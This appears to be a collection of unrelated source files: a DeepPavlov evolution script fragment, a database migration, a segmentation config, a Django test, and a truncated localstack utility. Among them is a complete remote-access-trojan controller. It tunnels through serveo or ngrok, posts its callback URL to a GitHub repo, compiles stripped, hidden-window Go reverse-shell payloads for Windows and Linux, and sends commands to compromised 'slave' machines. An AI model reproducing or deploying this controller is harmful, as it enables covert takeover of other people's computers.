result_table_dict[el + "_test"] = []
result_table_columns.extend([el + "_valid", el + "_test"])
result_table_dict["params"] = []
result_table_columns.append("params")
if start_from_population == 0:
# if starting evolution from scratch
iters = 0
result_table = pd.DataFrame(result_table_dict)
# write down result table file
result_table.loc[:, result_table_columns].to_csv(result_file, index=False, sep='\t')
log.info("Iteration #{} starts".format(iters))
# randomly generate the first population
population = evolution.first_generation()
else:
# if starting evolution from already existing population
iters = start_from_population
log.info("Iteration #{} starts".format(iters))
population = []
for i in range(population_size):
population.append(read_json(expand_path(Path(path_to_population).joinpath(
"model_" + str(i)).joinpath("config.json"))))
population[i] = evolution.insert_value_or_dict_into_config(
population[i], evolution.main_model_path + ["save_path"],
str(Path(
evolution.get_value_from_config(evolution.basic_config, evolution.main_model_path + ["save_path"])
).joinpath(
"population_" + str(start_from_population)).joinpath(
"model_" + str(i)).joinpath(
"model")))
population[i] = evolution.insert_value_or_dict_into_config(
population[i], evolution.main_model_path + ["load_path"],
str(Path(
evolution.get_value_from_config(population[i], evolution.main_model_path + ["load_path"]))))
for path_id, path_ in enumerate(evolution.paths_to_fiton_dicts):
population[i] = evolution.insert_value_or_dict_into_config(
population[i], path_ + ["save_path"],
str(Path(evolution.get_value_from_config(evolution.basic_config,
evolution.main_model_path + ["save_path"])
).joinpath("population_" + str(iters)).joinpath("model_" + str(i)).joinpath(
"fitted_model_" + str(path_id))))
for path_id, path_ in enumerate(evolution.paths_to_fiton_dicts):
population[i] = evolution.insert_value_or_dict_into_config(
population[i], path_ + ["load_path"],
str(Path(evolution.get_value_from_config(
population[i], path_ + ["load_path"]))))
run_population(population, evolution, gpus)
population_scores = results_to_table(population, evolution, considered_metrics,
result_file, result_table_columns)[evolve_metric]
log.info("Population scores: {}".format(population_scores))
log.info("Iteration #{} was done".format(iters))
iters += 1
while True:
if iterations != -1 and start_from_population + iterations == iters:
log.info("End of evolution on iteration #{}".format(iters))
break
log.info("Iteration #{} starts".format(iters))
population = evolution.next_generation(population, population_scores, iters)
run_population(population, evolution, gpus)
population_scores = results_to_table(population, evolution, considered_metrics,
result_file, result_table_columns)[evolve_metric]
log.info("Population scores: {}".format(population_scores))
log.info("Iteration #{} was done".format(iters))
iters += 1
def run_population(population, evolution, gpus):
"""
Change save and load paths for obtained population, save config.json with model config,
run population via current python executor (with which evolve.py already run)
and on given devices (-1 means CPU, other integeres - visible for evolve.py GPUs)
Args:
population: list of dictionaries - configs of current population
evolution: ParamsEvolution
gpus: list of given devices (list of integers)
Returns:
None
"""
population_size = len(population)
for k in range(population_size // len(gpus) + 1):
procs = []
for j in range(len(gpus)):
i = k * len(gpus) + j
if i < population_size:
save_path = expand_path(Path(evolution.get_value_from_config(
population[i], evolution.main_model_path + ["save_path"])).parent)
save_path.mkdir(parents=True, exist_ok=True)
f_name = save_path.joinpath("config.json")
save_json(population[i], f_name)
if len(gpus) == 1 and gpus[0] == -1:
procs.append(Popen("{} -m deeppavlov train {}"
" 1>{}/out.txt 2>{}/err.txt".format(sys.executable,
str(f_name),
str(save_path),
str(save_path)
),
shell=True, stdout=PIPE, stderr=PIPE))
else:
procs.append(Popen("CUDA_VISIBLE_DEVICES={} {} -m deeppavlov train {}"
" 1>{}/out.txt 2>{}/err.txt".format(gpus[j],
sys.executable,
str(f_name),
str(save_path),
str(save_path)
),
shell=True, stdout=PIPE, stderr=PIPE))
for j, proc in enumerate(procs):
i = k * len(gpus) + j
log.info(f'Waiting on {i}th proc')
proc.wait()
return None
def results_to_table(population, evolution, considered_metrics, result_file, result_table_columns):
population_size = len(population)
validate_best = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "validate_best"))[0]
+ ["validate_best"])
test_best = evolution.get_value_from_config(evolution.basic_config,
list(evolution.find_model_path(
evolution.basic_config, "test_best"))[0]
+ ["test_best"])
if (not validate_best) and test_best:
log.info("Validate_best is set to False. Tuning parameters on test")
elif (not validate_best) and (not test_best):
raise ConfigError("Validate_best and test_best are set to False. Can not evolve.")
population_metrics = {}
for m in considered_metrics:
population_metrics[m] = []
for i in range(population_size):
with open(str(expand_path(Path(evolution.get_value_from_config(
population[i],
evolution.main_model_path + ["save_path"])).parent.joinpath("out.txt"))), "r", encoding='utf8') as fout:
reports_data = fout.read().splitlines()[-2:]
reports = []
for j in range(2):
try:
reports.append(json.loads(reports_data[j]))
except:
pass
val_results = {}
test_results = {}
for m in considered_metrics:
val_results[m] = None
test_results[m] = None
if len(reports) == 2 and "valid" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[0]["valid"]["metrics"]
test_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "valid" in reports[0].keys() and "valid" in reports[1].keys():
val_results = reports[1]["valid"]["metrics"]
elif len(reports) == 2 and "test" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "valid" in reports[1].keys():
val_results = reports[1]["valid"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "test" in reports[1].keys():
val_results = reports[1]["test"]["metrics"]
elif len(reports) == 2 and "train" in reports[0].keys() and "train" in reports[1].keys():
val_results = reports[1]["train"]["metrics"]
elif len(reports) == 1 and "valid" in reports[0].keys():
val_results = reports[0]["valid"]["metrics"]
elif len(reports) == 1 and "test" in reports[0].keys():
test_results = reports[0]["test"]["metrics"]
else:
raise ConfigError("Can not proceed output files: didn't find valid and/or test results")
result_table_dict = {}
for el in result_table_columns:
result_table_dict[el] = []
for m in considered_metrics:
result_table_dict[m + "_valid"].append(val_results[m])
result_table_dict[m + "_test"].append(test_results[m])
if validate_best:
population_metrics[m].append(val_results[m])
elif test_best:
population_metrics[m].append(test_results[m])
result_table_dict[result_table_columns[-1]] = [population[i]]
result_table = pd.DataFrame(result_table_dict)
result_table.loc[:, result_table_columns].to_csv(result_file, index=False, sep='\t', mode='a', header=None)
return population_metrics
if __name__ == "__main__":
main()
|
the-stack_106_13050
|
"""CreateListTable Migration."""
from masoniteorm.migrations import Migration
class CreateListTable(Migration):
def up(self):
"""
Run the migrations.
"""
with self.schema.create("list") as table:
table.increments("id")
table.string("item")
table.string("amount")
table.timestamps()
def down(self):
"""
Revert the migrations.
"""
self.schema.drop("list")
|
the-stack_106_13051
|
"""
Dataset: ESC Corridor 1718 (VOC Type)
Method: FCN (hrnet)
Backbone:hr18s (We load the hr18 config and make modifications to it)- s stands for small
Crop Size: 512x1024
Lr Schd: 80000
"""
_base_ = [
'../_base_/models/fcn_hr18.py', '../_base_/datasets/pascal_esccorridor_1718.py',
'../_base_/default_runtime.py', '../_base_/schedules/schedule_80k.py'
]
model = dict(
pretrained='open-mmlab://msra/hrnetv2_w18_small',
backbone=dict(
extra=dict(
stage1=dict(num_blocks=(2, )),
stage2=dict(num_blocks=(2, 2)),
stage3=dict(num_modules=3, num_blocks=(2, 2, 2)),
stage4=dict(num_modules=2, num_blocks=(2, 2, 2, 2)))),
decode_head=dict(num_classes=2))
|
the-stack_106_13054
|
try:
import os
import sys
import threading
from time import sleep
from git import Repo
from termcolor import colored
import json
import subprocess
from datetime import date
import random
import string
from shutil import copy2
from pathlib import Path
from pyngrok import ngrok
except:
os.system("python3 -m pip install Gitpython")
os.system("python3 -m pip install termcolor")
os.system("python3 -m pip install pyngrok")
try:
from git import Repo
from termcolor import colored
from pyngrok import ngrok
except:
os.system("pip3 install Gitpython")
os.system("pip3 install termcolor")
os.system("pip3 install pyngrok")
from git import Repo
from termcolor import colored
from pyngrok import ngrok
print("Run me again! :)")
sys.exit()
repox = ""
urix = ""
comx = ""
ngrox = ""
def banner(lastupdate):
banner = f"""
(
\\
) ##########################################
##-------->>> #version >>> 0.1 (beta) #
) #last update >>> {lastupdate} #
/ #coded by script1337 #
( #github >>> https://github.com/script1337#
45hw477h4m4 >>> {{A King Above Ace}}
_.-"/______________________/////
`'-.\~~~~~~~~~~~~~~~~~~~~~~\\\\\\\\\\"""
return banner
if os.name == "nt":
homedir = str(Path.home())
else:
homedir = str(os.environ['HOME'])
def killx():
global urix, ngrox
printfc("stopping the server!", "red")
f = open("exit.asw", "w+")
f.close()
try:
ngrox.kill()
except:
pass
if os.name == "nt":
pass
else:
os.system("killall screen")
try:
os.remove("script1337.sh")
except:
pass
def linx():
if os.name == "nt":
linx = "\\"
else:
linx = "/"
return linx
def checks():
if os.path.exists(os.getcwd() + linx() + "data"):
pass
else:
os.makedirs("data")
def setup(repo, url):
if os.path.isdir(repo):
pass
else:
os.remove("config.json")
printfc("Repo not found!", "red")
killx()
sys.exit()
os.system("echo " + url + " > " + "." + linx() + repo + linx() + "urlx.txt")
repo = Repo('.' + linx() + repo) # if repo is CWD just do '.'
repo.index.add(['urlx.txt'])
repo.index.commit('45hw477h4m4:~# ')
origin = repo.remote('origin')
printfc("pushing new url ### ", "magenta")
try:
origin.push()
except:
printfc("Authentication failed!", "red")
# os.removedirs(str(repo))
# os.remove("config.json")
killx()
sys.exit()
def printfc(text, color):
if color == "red":
print(colored(text, 'red'))
if color == "green":
print(colored(text, 'green'))
if color == "yellow":
print(colored(text, 'yellow'))
if color == "cyan":
print(colored(text, 'cyan'))
if color == "magenta":
print(colored(text, 'magenta'))
def writex(username, contentx):
try:
with open(os.getcwd() + linx() + "data" + linx() + username + linx() + "recv.txt", "w+") as file:
file.write(contentx)
file.close()
except Exception as e:
if os.path.exists(os.getcwd() + linx() + "data" + linx() + username):
printfc("Something goes wrong ", "red")
printfc(e, "red")
else:
printfc("Slave " + username + " Not found!", "red")
def read():
while True:
try:
with open("response.txt", "r") as file:
data = file.read()
file.close()
response = data.replace("\n\n", "\n")
res = os.stat("response.txt")
if res.st_size == 0:
os.remove("response.txt")
elif data.replace(" ", "") == "":
continue
elif data.replace("\n", "") == "":
continue
else:
print("\n")
printfc(response, "cyan")
sleep(0.5)
os.remove("response.txt")
except:
pass
def checkbuildingconf():
global homedir
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
if "go version" in subprocess.check_output(["go", "version"]).decode():
checkgo = os.path.exists(str(homedir) + linx() + "go")
if checkgo:
checksrc = os.path.exists(str(homedir) + linx() + "go" + linx() + "src")
if checksrc:
revfile = os.path.isfile(rev)
winrevfile = os.path.isfile(winrev)
if revfile and winrevfile:
printfc("Everythink looking good", "green")
return True
else:
copy2("." + linx() + "source" + linx() + "rev.go",
homedir + linx() + "go" + linx() + "src" + linx() + "rev")
copy2("." + linx() + "source" + linx() + "winrev.go",
homedir + linx() + "go" + linx() + "src" + linx() + "rev")
return True
else:
os.makedirs(str(homedir) + linx() + "go" + linx() + "src")
return True
else:
printfc("Failed to build", "red")
printfc("Go path is not set!", "red")
return False
else:
printfc("please install go!", "red")
printfc("Go is not installed!", "red")
return False
def rawtogit(s):
str1 = ""
z = 1
for ele in s:
if z >= 4:
str1 += "/" + ele
else:
str1 += ele
z = z + 1
return str1
def animation():
global comx
printfc("Compiling:", "cyan")
animation = ["[■□□□□□□□□□]", "[■■□□□□□□□□]", "[■■■□□□□□□□]", "[■■■■□□□□□□]", "[■■■■■□□□□□]", "[■■■■■■□□□□]",
"[■■■■■■■□□□]", "[■■■■■■■■□□]", "[■■■■■■■■■□]", "[■■■■■■■■■■]"]
for i in range(len(animation)):
sleep(0.2)
sys.stdout.write(colored("\r" + animation[i % len(animation)], 'red'))
sys.stdout.flush()
if comx != "":
printfc("\n" + comx, "red")
sys.exit()
def callanimation():
the_process = threading.Thread(target=animation)
the_process.start()
return the_process
def writeonrev(option):
global repo, homedir, repox
line_to_replace = 44
if repox == "":
git = repo.replace("https://github.com", "https://raw.githubusercontent.com").split("/")
else:
git = repox.replace("https://github.com", "https://raw.githubusercontent.com").split("/")
git[1] = "//"
if rawtogit(git).endswith(".git"):
rawgit = "https://rawgitsuck.herokuapp.com/raw?git=" + rawtogit(git)[:-4] + "/master/urlx.txt"
else:
rawgit = "https://rawgitsuck.herokuapp.com/raw?git=" + rawtogit(git) + "/master/urlx.txt"
text = """\turlx, _ := reciver(string("{rawgit}"))""".format(rawgit=rawgit)
printfc("###UrL Resolver set to >>> " + str(rawgit), "green")
if option == 3 or option == 4:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
else:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
with open(rev, 'r') as file:
lines = file.readlines()
if len(lines) > int(line_to_replace):
lines[line_to_replace] = text + '\n'
with open(rev, 'w') as file:
file.writelines(lines)
def builder():
global comx, homedir
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
if checkbuildingconf():
printfc("###Select os and arch >>> ", "green")
printfc("#1.Windows 64", "cyan")
printfc("#2.Windows 32", "cyan")
printfc("#3.linux 64", "cyan")
printfc("#4.linux 32", "cyan")
print(colored("#app::builder> ", 'yellow'), end="")
try:
options = int(input(""))
except:
pass
if os.name == "nt":
win = True
else:
win = False
try:
writeonrev(options)
if options == 1:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"windows\\"; $Env:GOARCH = \\"amd64\\"; go build -ldflags \\"-s -w\\" -ldflags -H=windowsgui -o revW64.exe "' + winrev,
shell=True)
else:
os.system(
"env GOOS=windows GOARCH=amd64 go build -ldflags \"-s -w\" -ldflags -H=windowsgui -o revW64.exe " + winrev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revW64.exe")
com.join()
elif options == 2:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"windows\\"; $Env:GOARCH = \\"386\\"; go build -ldflags \\"-s -w\\" -ldflags -H=windowsgui -o revW32.exe "' + winrev,
shell=True)
else:
os.system(
"env GOOS=windows GOARCH=386 go build -ldflags \"-s -w\" -ldflags -H=windowsgui -o revW32.exe " + winrev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revW32.exe")
com.join()
elif options == 3:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"linux\\"; $Env:GOARCH = \\"amd64\\"; go build -ldflags \\"-s -w\\" -o revL64 "' + rev,
shell=True)
else:
os.system("env GOOS=linux GOARCH=amd64 go build -ldflags \"-s -w\" -o revL64 " + rev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revL64")
com.join()
elif options == 4:
printfc("###Start compiling the payload >>> ", "yellow")
com = callanimation()
if win:
subprocess.call(
'powershell.exe $Env:GOOS = \\"linux\\"; $Env:GOARCH = \\"386\\"; go build -ldflags \\"-s -w\\" -o revL32 "' + rev,
shell=True)
else:
os.system("env GOOS=linux GOARCH=386 go build -ldflags \"-s -w\" -o revL32 " + rev)
comx = "Build successfull >>> {rev}".format(rev=os.getcwd() + linx() + "revL32")
com.join()
else:
printfc("Please select a valid option", "red")
except:
printfc("Please select a valid option", "red")
else:
pass
def helper():
help = """
{{
####Configration>>>
app::build {{ ###build payload >>> }}
app::config {{ ###Change github repo and reconfigure >>> }}
app::quit {{ ###quit >>> }}
app::slave {{ ###to see all slave computers >>> }}
####remote command>>>
username::command {{ ###run command on slave computer
example {{
script::ls -la
}}
}}
}}
"""
printfc(help, "red")
def sendcommand():
global urix
while True:
print(colored("45hw477h4m4:~# ", 'yellow'), end="")
xenz = input("")
try:
command = xenz.split("::")
except:
continue
if xenz == "":
continue
elif xenz.startswith("!"):
os.system(xenz.split("!")[1])
continue
if command[0] == "app":
try:
if command[1] == "slave":
try:
with open(os.getcwd() + linx() + "data" + linx() + "users.txt") as user:
printfc("Active slaves >>> ", "cyan")
printfc(user.read(), "cyan")
user.close()
except:
printfc("No slaves are found!", "red")
elif command[1] == "quit":
printfc("\ngoodbye", "red")
killx()
sys.exit()
elif command[1] == "build":
builder()
elif command[1] == "help":
helper()
elif command[1] == "config":
printfc("removing old config.json", "red")
try:
rev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "rev.go"
winrev = homedir + linx() + "go" + linx() + "src" + linx() + "rev" + linx() + "winrev.go"
os.remove("config.json")
os.remove(rev)
os.remove(winrev)
except:
pass
if setconfig():
printfc("Config generated successfully!", "green")
with open("config.json", "r") as config:
confx = json.loads(config.read())
repox = confx["repo"]
config.close()
setup(repox.split("/")[4], urix)
except:
continue
else:
try:
writex(command[0], command[1])
except:
printfc("something goes Wrong", "red")
printfc("{ example >>> \n \tscript::ls -la \n \tapp::quit\n \t!ls -la\n}", "green")
def setconfig():
global repox
printfc("Running Setup ### ", "yellow")
datex = str(date.today())
printfc("Enter your repo url ###", "yellow")
repourl = input("# ")
try:
repo = repourl.split("/")
except:
printfc("#Enter a git repo url ###", "red")
killx()
sys.exit()
try:
if os.name == "nt":
subprocess.run('RD /S /Q ' + repo[4], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
else:
os.system("rm -rf " + repo[4])
printfc("old repo get removed", "yellow")
except Exception as e:
print(e)
printfc("Trying to Cloning git repo ###", "magenta")
try:
Repo.clone_from(repourl, os.getcwd() + linx() + repo[4])
except Exception as ex:
e = str(ex)
if "does not exist" in e:
printfc("repository does not exist", "red")
killx()
sys.exit()
else:
printfc(e, "red")
config = """
{
"repo": \"""" + repourl + """\",
"lastupdate": \"""" + datex + """\"
}
"""
with open("config.json", "w+") as configx:
configx.write(str(config))
configx.close()
repox = repourl
return True
def randomString(stringLength=32):
letters = string.ascii_lowercase
return ''.join(random.choice(letters) for i in range(stringLength))
def createtunnel():
global urix
domain = str(randomString(32))
urix = "https://" + domain + ".serveousercontent.com"
if os.name == "nt":
os.system("start /min ssh -R " + domain + ":80:127.0.0.1:5000 serveo.net &")
else:
os.system("echo 'ssh -R " + domain + ":80:localhost:5000 serveo.net' > script1337.sh")
os.system("chmod +x script1337.sh")
os.system("screen -d -m bash script1337.sh")
def startserver():
try:
os.remove("exit.asw")
except:
pass
if os.name == "nt":
os.system("start /min python3 server.py &")
else:
os.system("nohup python3 server.py >/dev/null 2>&1 &")
if __name__ == '__main__':
if os.name == "nt":
os.system('color')
printfc("Starting the server!", "green")
printfc("Creating tunnel using ###", "green")
printfc("#1.serveo tunnel ###", "green")
printfc("#2.ngrok tunnel ###", "green")
print(colored("app::tunneling:~# ", 'yellow'), end="")
ngse = input("")
if ngse == str("1"):
createtunnel()
elif ngse == str("2"):
urix = ngrok.connect(port='5000', proto='http')
else:
printfc("###Please select a valid option ###", "red")
sys.exit()
startserver()
repo = ""
try:
try:
with open("config.json", "r") as config:
conf = json.loads(config.read())
# print(conf)
repo = conf["repo"]
lastupdate = conf["lastupdate"]
config.close()
printfc(banner(lastupdate), "cyan")
printfc("public_url >>> " + urix, "green")
except FileNotFoundError:
printfc(banner(str(date.today())), "cyan")
if setconfig():
printfc("Config generated successfully!", "green")
printfc("public_url >>> " + urix, "green")
checks()
try:
setup(repo.split("/")[4], urix)
except:
try:
setup(repox.split("/")[4], urix)
except Exception as e:
printfc("Run me again!", "yellow")
sys.exit()
tr = threading.Thread(target=read)
tr.daemon = True
tr.start()
printfc("###run app::help to see all options >>>", "magenta")
sendcommand()
except KeyboardInterrupt:
printfc("\ngoodbye", "red")
killx()
sys.exit()
|
the-stack_106_13055
|
# Copyright 2018 Red Hat, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from mock import patch
from fixture import DjangoFixture
from collections import OrderedDict
from fixture.style import NamedDataStyle
from fixture.django_testcase import FixtureTestCase
from dashboard.managers.packages import PackagesManager
from dashboard.tests.testdata.db_fixtures import (
LanguageData, LanguageSetData, PlatformData, ProductData, ReleaseData, PackageData
)
from dashboard.tests.testdata.mock_values import (
mock_requests_get_add_package, mock_requests_get_validate_package,
mock_requests_get_git_branches
)
db_fixture = DjangoFixture(style=NamedDataStyle())
class PackagesManagerTest(FixtureTestCase):
packages_manager = PackagesManager()
fixture = db_fixture
datasets = [LanguageData, LanguageSetData, ProductData, ReleaseData, PackageData]
def test_get_packages(self):
"""
Test get_packages
"""
packages = self.packages_manager.get_packages()
self.assertEqual(len(packages), 4)
package_names = [PackageData.package_anaconda.package_name,
PackageData.package_ibus.package_name]
packages = self.packages_manager.get_packages(pkgs=package_names).values()
self.assertEqual(len(packages), 2)
self.assertEqual(packages[0]['package_name'], PackageData.package_anaconda.package_name)
self.assertEqual(packages[1]['package_name'], PackageData.package_ibus.package_name)
# todo: test the filtering according to params
# params = ['package_name', 'upstream_url']
# packages = self.packages_manager.get_packages(pkgs=['ibus'], pkg_params=params)
# self.assertTrue(set(params).issubset(vars(packages.get()).keys()))
def test_is_package_exist(self):
"""
Test is_package_exist
"""
self.assertTrue(self.packages_manager.is_package_exist(PackageData.package_anaconda.package_name))
self.assertFalse(self.packages_manager.is_package_exist('otherpackage'))
@patch('requests.request', new=mock_requests_get_add_package)
def test_add_package(self):
"""
Test add_package
"""
transplatform = PlatformData.platform_zanata_fedora.platform_slug
kwargs = {'package_name': 'authconfig', 'upstream_url': 'https://github.com/jcam/authconfig',
'transplatform_slug': transplatform, 'release_streams': ['fedora']}
package_added = self.packages_manager.add_package(**kwargs)
self.assertTrue(package_added)
self.assertTrue(self.packages_manager.is_package_exist('authconfig'))
package_added = self.packages_manager.add_package(**kwargs)
self.assertFalse(package_added)
def test_count_packages(self):
"""
Test count_packages
"""
count = self.packages_manager.count_packages()
self.assertEqual(count, 4)
def test_get_package_name_tuple(self):
"""
Test get_package_name_tuple
"""
tuples = self.packages_manager.get_package_name_tuple()
self.assertEqual(len(tuples), 4)
self.assertEquals(tuples[0], ('anaconda', 'anaconda'))
@patch('requests.request', new=mock_requests_get_validate_package)
def xtest_validate_package(self):
"""
Test validate_package
"""
transplatform = PlatformData.platform_zanata_public.platform_slug
package_candlepin_name = PackageData.package_candlepin.package_name
package_validated = self.packages_manager.validate_package(package_name=package_candlepin_name,
transplatform_slug=transplatform)
self.assertEqual(package_validated, package_candlepin_name)
package_validated = self.packages_manager.validate_package(package_name='otherpackage',
transplatform_slug=transplatform)
self.assertFalse(package_validated)
def xtest_get_lang_id_name_dict(self):
"""
Test get_lang_id_name_dict
"""
lang_dict = self.packages_manager.get_lang_id_name_dict(
release_branch=ReleaseData.release_f27.release_slug
)
self.assertDictEqual(lang_dict, OrderedDict(
[(('fr_FR', 'fr'), 'French'), (('ja_JP', 'ja'), 'Japanese'), (('ru_RU', 'ru'), 'Russian')]))
def xtest_get_package_releases(self):
"""
Test get_package_releases
"""
package_releases = self.packages_manager.get_package_releases(
PackageData.package_anaconda.package_name
)
self.assertEqual(len(package_releases), 1)
self.assertEquals(package_releases[0].release_name, 'Fedora 27')
self.assertEquals(package_releases[0].product_slug.product_name, 'Fedora')
self.assertEquals(package_releases[0].language_set_slug.lang_set_name, 'F27 Set')
@patch('requests.request', new=mock_requests_get_git_branches)
def xtest_git_branches(self):
"""
Test git_branches
"""
scm_branch = self.packages_manager.git_branches(
package_name=PackageData.package_anaconda.package_name,
repo_type='l10n'
)
self.assertEqual(len(scm_branch), 2)
self.assertListEqual(scm_branch, ['autoupdate-potfiles', 'main'])
|
the-stack_106_13056
|
import json
import logging
import os
import re
import socket
import sys
import threading
import time
from typing import Dict, Optional, Union
from urllib.parse import urlparse
if sys.version_info >= (3, 8):
from typing import TypedDict
else:
from typing_extensions import TypedDict
import boto3
import botocore
import botocore.config
from botocore.utils import ArnParser, InvalidArnException
from localstack import config, constants
from localstack.constants import (
APPLICATION_AMZ_JSON_1_0,
APPLICATION_AMZ_JSON_1_1,
APPLICATION_X_WWW_FORM_URLENCODED,
ENV_DEV,
INTERNAL_AWS_ACCESS_KEY_ID,
LOCALHOST,
MAX_POOL_CONNECTIONS,
MOTO_ACCOUNT_ID,
REGION_LOCAL,
S3_VIRTUAL_HOSTNAME,
TEST_AWS_ACCESS_KEY_ID,
TEST_AWS_ACCOUNT_ID,
TEST_AWS_SECRET_ACCESS_KEY,
)
from localstack.utils.aws import templating
from localstack.utils.aws.aws_models import KinesisStream
from localstack.utils.common import (
get_service_protocol,
is_string,
is_string_or_bytes,
make_http_request,
retry,
run_safe,
to_str,
)
from localstack.utils.generic import dict_utils
# AWS environment variable names
ENV_ACCESS_KEY = "AWS_ACCESS_KEY_ID"
ENV_SECRET_KEY = "AWS_SECRET_ACCESS_KEY"
ENV_SESSION_TOKEN = "AWS_SESSION_TOKEN"
# set up logger
LOG = logging.getLogger(__name__)
# cache local region
LOCAL_REGION = None
# Use this flag to enable creation of a new session for each boto3 connection.
CREATE_NEW_SESSION_PER_BOTO3_CONNECTION = False
# Used in AWS assume role function
INITIAL_BOTO3_SESSION = None
# Boto clients cache
BOTO_CLIENTS_CACHE = {}
# Assume role loop seconds
DEFAULT_TIMER_LOOP_SECONDS = 60 * 50
# maps SQS queue ARNs to queue URLs
SQS_ARN_TO_URL_CACHE = {}
# List of parameters with additional event target parameters
EVENT_TARGET_PARAMETERS = ["$.SqsParameters", "$.KinesisParameters"]
# cached value used to determine the DNS status of the S3 hostname (whether it can be resolved properly)
CACHE_S3_HOSTNAME_DNS_STATUS = None
# mutex used when creating boto clients (which isn't thread safe: https://github.com/boto/boto3/issues/801)
BOTO_CLIENT_CREATE_LOCK = threading.RLock()
class Environment(object):
def __init__(self, region=None, prefix=None):
# target is the runtime environment to use, e.g.,
# 'local' for local mode
self.region = region or get_local_region()
# prefix can be 'prod', 'stg', 'uat-1', etc.
self.prefix = prefix
def apply_json(self, j):
if isinstance(j, str):
j = json.loads(j)
self.__dict__.update(j)
@staticmethod
def from_string(s):
parts = s.split(":")
if len(parts) == 1:
if s in PREDEFINED_ENVIRONMENTS:
return PREDEFINED_ENVIRONMENTS[s]
parts = [get_local_region(), s]
if len(parts) > 2:
raise Exception('Invalid environment string "%s"' % s)
region = parts[0]
prefix = parts[1]
return Environment(region=region, prefix=prefix)
@staticmethod
def from_json(j):
if not isinstance(j, dict):
j = j.to_dict()
result = Environment()
result.apply_json(j)
return result
def __str__(self):
return "%s:%s" % (self.region, self.prefix)
PREDEFINED_ENVIRONMENTS = {ENV_DEV: Environment(region=REGION_LOCAL, prefix=ENV_DEV)}
def get_environment(env=None, region_name=None):
"""
Return an Environment object based on the input arguments.
Parameter `env` can be either of:
* None (or empty), in which case the rules below are applied to (env = os.environ['ENV'] or ENV_DEV)
* an Environment object (then this object is returned)
* a string '<region>:<name>', which corresponds to Environment(region='<region>', prefix='<prefix>')
* the predefined string 'dev' (ENV_DEV), which implies Environment(region='local', prefix='dev')
* a string '<name>', which implies Environment(region=DEFAULT_REGION, prefix='<name>')
Additionally, parameter `region_name` can be used to override DEFAULT_REGION.
"""
if not env:
if "ENV" in os.environ:
env = os.environ["ENV"]
else:
env = ENV_DEV
elif not is_string(env) and not isinstance(env, Environment):
raise Exception("Invalid environment: %s" % env)
if is_string(env):
env = Environment.from_string(env)
if region_name:
env.region = region_name
if not env.region:
raise Exception('Invalid region in environment: "%s"' % env)
return env
def is_local_env(env):
return not env or env.region == REGION_LOCAL or env.prefix == ENV_DEV
class Boto3Session(boto3.session.Session):
"""Custom boto3 session that points to local endpoint URLs."""
def resource(self, service, *args, **kwargs):
self._fix_endpoint(kwargs)
return connect_to_resource(service, *args, **kwargs)
def client(self, service, *args, **kwargs):
self._fix_endpoint(kwargs)
return connect_to_service(service, *args, **kwargs)
def _fix_endpoint(self, kwargs):
if "amazonaws.com" in kwargs.get("endpoint_url", ""):
kwargs.pop("endpoint_url")
def get_boto3_session(cache=True):
if not cache or CREATE_NEW_SESSION_PER_BOTO3_CONNECTION:
return boto3.session.Session()
# return default session
return boto3
def get_region():
# Note: leave import here to avoid import errors (e.g., "flask") for CLI commands
from localstack.utils.aws.request_context import get_region_from_request_context
region = get_region_from_request_context()
if region:
return region
# fall back to returning static pre-defined region
return get_local_region()
def get_partition(region_name: str = None):
region_name = region_name or get_region()
return boto3.session.Session().get_partition_for_region(region_name)
def get_local_region():
global LOCAL_REGION
if LOCAL_REGION is None:
session = boto3.session.Session()
LOCAL_REGION = session.region_name or ""
return config.DEFAULT_REGION or LOCAL_REGION
def is_internal_call_context(headers):
"""Return whether we are executing in the context of an internal API call, i.e.,
the case where one API uses a boto3 client to call another API internally."""
auth_header = headers.get("Authorization") or ""
return get_internal_credential() in auth_header
def get_internal_credential():
return "Credential=%s/" % INTERNAL_AWS_ACCESS_KEY_ID
def set_internal_auth(headers):
authorization = headers.get("Authorization") or ""
if authorization.startswith("AWS "):
# Cover Non HMAC Authentication
authorization = re.sub(
r"AWS [^/]+",
"AWS %s" % get_internal_credential(),
authorization,
)
else:
authorization = re.sub(
r"Credential=[^/]+/",
get_internal_credential(),
authorization,
)
headers["Authorization"] = authorization
return headers
def get_local_service_url(service_name_or_port: Union[str, int]) -> str:
"""Return the local service URL for the given service name or port."""
if isinstance(service_name_or_port, int):
return f"{get_service_protocol()}://{LOCALHOST}:{service_name_or_port}"
service_name = service_name_or_port
if service_name == "s3api":
service_name = "s3"
elif service_name == "runtime.sagemaker":
service_name = "sagemaker-runtime"
return config.service_url(service_name)
def connect_to_resource(
service_name, env=None, region_name=None, endpoint_url=None, *args, **kwargs
):
"""
